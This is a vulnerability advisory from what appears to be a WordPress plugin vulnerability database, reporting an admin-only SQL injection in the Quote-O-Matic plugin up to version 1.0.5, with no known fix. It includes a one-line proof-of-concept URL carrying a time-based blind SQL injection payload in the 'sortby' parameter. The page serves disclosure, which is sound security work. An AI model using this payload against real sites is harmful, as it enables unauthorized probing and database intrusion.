WordPress Plugin Vulnerabilities

Quote-O-Matic <= 1.0.5 - Admin+ SQLi

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Proof of Concept

https://example.com/wp-admin/edit.php?page=quote-o-matic.php&sortby=qomID+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Daniel Krohmer, Kunal Sharma
Submitter
Daniel Krohmer
Verified
Yes

Timeline

Publicly Published
2022-12-12 (about 1 years ago)
Added
2022-12-12 (about 1 years ago)
Last Updated
2022-12-12 (about 1 years ago)

Other